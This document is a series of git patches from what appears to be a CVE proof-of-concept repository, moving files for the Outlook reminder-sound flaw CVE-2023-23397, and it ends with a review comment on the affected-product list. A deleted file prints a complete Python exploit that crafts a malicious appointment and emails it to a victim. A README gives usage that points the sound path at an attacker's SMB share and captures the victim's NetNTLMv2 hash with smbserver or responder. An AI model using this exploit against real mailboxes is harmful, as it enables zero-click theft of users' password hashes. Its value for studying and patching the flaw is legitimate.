@@ -0,0 +1,19 @@ +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None + tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 8869f9f3df4ef566ea0436c876589a8a7847a7bd Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:16:04 +0000 Subject: [PATCH 20/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/CVE-2023-23397.py | 70 -------------------- cve/Outlook/CVE-2023-23397/README.md | 41 ------------ 2 files changed, 111 deletions(-) delete mode 100644 cve/Outlook/CVE-2023-23397/CVE-2023-23397.py delete mode 100644 cve/Outlook/CVE-2023-23397/README.md diff --git a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py deleted file mode 100644 index e40c7318..00000000 --- a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py +++ /dev/null 
@@ -1,70 +0,0 @@ -import smtplib, datetime, argparse -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText -from email.mime.application import MIMEApplication -from email.utils import COMMASPACE, formatdate -from independentsoft.msg import Message - -# Mail configuration : change it ! -smtp_server = "mail.example.com" -smtp_port = 587 - -sender_email = "attacker@mail.example.com" -sender_password = "P@ssw0rd" - -recipients_email = ["victim@mail.example.com"] - -class Email: - def __init__(self, smtp_server, port, username, password, recipient): - self.smtp_server = smtp_server - self.port = port - self.username = username - self.password = password - self.recipient = recipient - - def send(self, subject, body, attachment_path): - msg = MIMEMultipart() - msg['From'] = self.username - msg['To'] = COMMASPACE.join(self.recipient) - msg['Date'] = formatdate(localtime=True) - msg['Subject'] = subject - - msg.attach(MIMEText(body)) - - with open(attachment_path, 'rb') as f: - part = MIMEApplication(f.read(), Name=attachment_path) - part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' - msg.attach(part) - - try: - server = smtplib.SMTP(self.smtp_server, self.port) - server.starttls() - server.login(self.username, self.password) - server.sendmail(self.username, self.recipient, msg.as_string()) - server.quit() - print("[+] Malicious appointment sent !") - - - except Exception as e: - print("[-] Error with SMTP server...", e) - -parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') -parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) -args = parser.parse_args() - -appointment = Message() -appointment.message_class = "IPM.Appointment" -appointment.subject = "CVE-2023-23397" -appointment.body = "New meeting now !" 
-appointment.location = "Paris" -appointment.appointment_start_time = datetime.datetime.now() -appointment.appointment_end_time = datetime.datetime.now() -appointment.reminder_override_default = True -appointment.reminder_sound_file = args.path -appointment.save("appointment.msg") - -email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) - -subject = "Hello There !" -body = "Important appointment !" -email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/CVE-2023-23397/README.md b/cve/Outlook/CVE-2023-23397/README.md deleted file mode 100644 index 094e829d..00000000 --- a/cve/Outlook/CVE-2023-23397/README.md +++ /dev/null @@ -1,41 +0,0 @@ -# CVE-2023-23397 - -Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. - -## Description - -Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). - -An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. - -## What does the poc do? - -1. Generated `.msg` payload. -2. Send it by email with custom SMTP server. - -## Usage - -In one session : - -```python -python CVE-2023-23397.py - -usage: CVE-2023-23397.py [-h] -p PATH -CVE-2023-23397.py: error: the following arguments are required: -p/--path - -python CVE-2023-23397.py --path '\\yourip\' -``` - -In a second session (`smbserver` or `responder` as you want). - -``` -smbserver.py -smb2support SHARE . -``` - -## Demo (manual poc) - -![poc](poc.gif) - -## Original article - -https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee 
From 6238732f9d00091af0e82a962012d41548b48d2e Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:16:12 +0000 Subject: [PATCH 21/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/CVE-2023-23397.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/Outlook/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/yaml/CVE-2023-23397.yaml b/cve/Outlook/yaml/CVE-2023-23397.yaml deleted file mode 100644 index f5183573..00000000 --- a/cve/Outlook/yaml/CVE-2023-23397.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2023-23397 -source: https://github.com/Trackflaw/CVE-2023-23397 -info: - name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 - severity: critical - description: | - Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). - scope-of-influence: - outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-23397 - cwe-id: CWE-294 - cnvd-id: None - kve-id: None - tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 63dcf28200f9571ec5b199af64b899baa366d4c5 Mon Sep 17 00:00:00 2001 
From: Victoria Date: Wed, 22 Mar 2023 15:16:28 +0000 Subject: [PATCH 22/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/yaml/.keep diff --git a/cve/Outlook/2023/yaml/.keep b/cve/Outlook/2023/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1abe071efbfd44b53358ece848358b03c91c3645 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:24:29 +0000 Subject: [PATCH 23/24] update other_list.yaml. Signed-off-by: Victoria --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 428354b0..6dcfa282 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -13,6 +13,8 @@ cve: - CVE-2023-0179 polkit: - CVE-2021-3560 + Outlook: + - CVE-2023-23397 redis: - CVE-2022-0543 EsFileExplorer: -- Gitee From be3585a93216181fa8be7f4e2e0a7da19df05190 Mon Sep 17 00:00:00 2001 From: Victoria Date: Thu, 23 Mar 2023 02:54:16 +0000 Subject: [PATCH 24/24] update cve/Outlook/2023/yaml/CVE-2023-23397.yaml. Signed-off-by: Victoria --- cve/Outlook/2023/yaml/CVE-2023-23397.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml index f5183573..11f0fd08 100644 --- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml 
@@ -4,9 +4,9 @@ info: name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 severity: critical description: | - Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). scope-of-influence: - outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + outlook-2013, outlook-2016, outlook-2019 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 classification: -- Gitee
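Review bot: Removing `microsoft:office:2021` and `microsoft:office:2019` from `scope-of-influence` narrows the affected-product list with nothing in the commit to justify it, and if I recall the vendor advisory for this CVE correctly (reachable from the NVD entry already in `reference:`) Office 2019, Office LTSC 2021 and Microsoft 365 Apps are listed as affected alongside Outlook 2013/2016 — please verify before trimming. I would restore the two entries and add the advisory under `reference:` so the scope is traceable: `- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397`. The other edit in this hunk, to the `description:` line, appears to be whitespace-only from what is visible here.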